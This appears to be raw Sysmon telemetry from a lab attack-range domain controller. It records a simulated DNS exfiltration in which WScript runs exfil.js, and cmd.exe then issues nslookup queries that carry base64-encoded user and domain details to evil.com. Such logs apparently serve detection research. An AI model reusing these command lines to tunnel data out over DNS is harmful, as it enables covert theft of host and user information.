C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1904-629A-F646-000000005F02}6688C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlquio.tmp 2>&1 10341000x8000000000000000217252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.689{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-F746-000000005F02}1432C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.689{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-F746-000000005F02}1432C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.673{2E1864BB-1904-629A-F746-000000005F02}14326020C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-F646-000000005F02}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.673{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-F746-000000005F02}1432C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.657{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.657{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.657{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-F646-000000005F02}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.657{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.657{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.657{2E1864BB-18E0-629A-6742-000000005F02}39766324C:\Windows\System32\WScript.exe{2E1864BB-1904-629A-F646-000000005F02}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.665{2E1864BB-1904-629A-F646-000000005F02}6688C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlquio.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.657{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnapgrf.tmpMD5=F2DEA30CCAFC980D2EE697947950EBBC,SHA256=F1E23F5C438D3FDCE7F81A746C6D3B73A4C9E6300EF433F28E2B4040CD435CFE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.109{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51459- 354300x8000000000000000217239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.109{00000000-0000-0000-0000-000000000000}7532<unknown process>-udptruefalse127.0.0.1-51459-false127.0.0.1-53domain 354300x8000000000000000217238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.108{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51458- 354300x8000000000000000217237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.108{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51458- 354300x8000000000000000217236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.108{00000000-0000-0000-0000-000000000000}7532<unknown process>-udptruefalse127.0.0.1-51458-false127.0.0.1-53domain 354300x8000000000000000217235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.107{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51457- 10341000x8000000000000000217234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.626{2E1864BB-1904-629A-F446-000000005F02}57004904C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-F546-000000005F02}5380C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.626{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.626{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.626{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.626{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.626{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-F546-000000005F02}5380C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.626{2E1864BB-1904-629A-F346-000000005F02}56924712C:\Windows\system32\cmd.exe{2E1864BB-1904-629A-F546-000000005F02}5380C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.628{2E1864BB-1904-629A-F546-000000005F02}5380C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1904-629A-F346-000000005F02}5692C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnapgrf.tmp 2>&1 10341000x8000000000000000217226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.610{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-F446-000000005F02}5700C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.610{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-F446-000000005F02}5700C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.605{2E1864BB-1904-629A-F446-000000005F02}57004904C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-F346-000000005F02}5692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.589{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-F446-000000005F02}5700C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.573{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.573{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.573{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.573{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.573{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-F346-000000005F02}5692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 